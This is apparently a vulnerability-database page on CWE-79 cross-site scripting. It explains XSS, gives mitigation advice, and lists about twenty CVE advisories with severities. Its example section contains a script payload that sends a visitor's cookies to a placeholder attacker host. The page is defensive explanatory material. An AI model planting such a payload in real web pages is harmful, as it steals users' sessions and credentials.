Fallos del tipo CWE-79

28.989 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2026-54505LOWTREK: Stored cross-user HTML injection via trip title in the Journey suggestion bannerEPSS 0.6%CVE-2026-54606HIGHSunEditor: DOM XSS in SunEditor Embed Plugin via External Script Element After Iframe EmbedEPSS 0.6%CVE-2020-36194MEDIUMXSS Vulnerability in QTS and QuTS heroCommand Injection Vulnerabilities in QTS and QuTS heroEPSS 0.6%CVE-2024-0438MEDIUMHappy Addons for Elementor <= 3.10.1 - Authenticated (Contributor+) Stored Cross-Site ScriptingEPSS 0.6%CVE-2021-24416—StreamCast < 2.1.1 - Contributor+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2026-44657HIGHMantisBT: Stored XSS in File DownloadEPSS 0.6%CVE-2021-23027—On version 16.0.x before 16.0.1.2, 15.1.x before 15.1.3.1, and 14.1.x before 14.1.4.3, a DOM based cross-site scripting (XSS) vulnerability EPSS 0.6%CVE-2021-24415—Polo Video Gallery <= 1.2 - Contributor+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2021-44201—Cross-site scripting (XSS) was possible in notification pop-upsEPSS 0.6%CVE-2024-3426LOWSourceCodester Online Courseware editt.php cross site scriptingEPSS 0.6%CVE-2022-38376MEDIUMMultiple improper neutralization of input during web page generation ('Cross-site Scripting') vulnerabilities [CWE-79] in Fortinet FortiNAC EPSS 0.6%CVE-2021-21004HIGHCross-site Scripting Vulnerability in Phoenix Contact FL SWITCH SMCS series productsEPSS 0.6%CVE-2025-47977HIGHNuance Digital Engagement Platform Spoofing VulnerabilityEPSS 0.6%CVE-2021-23054—On version 16.x before 16.1.0, 15.1.x before 15.1.4, 14.1.x before 14.1.4.4, and all versions of 13.1.x, 12.1.x, and 11.6.x, a reflected croEPSS 0.6%CVE-2024-13219MEDIUMPolicy Genius <= 2.0.4 - Reflected XSSEPSS 0.6%CVE-2025-66481CRITICALDeepChat's Incomplete XSS Fix Allows RCE through Mermaid ContentEPSS 0.6%CVE-2025-22465MEDIUMReflected XSS in Ivanti Endpoint Manager before version 2024 SU1 or before version 2022 SU7 allows a remote unauthenticated attacker to execEPSS 0.6%CVE-2026-13424HIGHOnline Scheduling and Appointment Booking System <= 27.7 - Unauthenticated Stored Cross-Site Scripting via bookly_speed_up_update_addons AJAX actionEPSS 0.6%CVE-2022-20629MEDIUMCisco Firepower Management Center Software Cross-Site Scripting VulnerabilitiesEPSS 0.6%CVE-2022-20781MEDIUMCisco Web Security Appliance Stored Cross-Site Scripting VulnerabilityEPSS 0.6%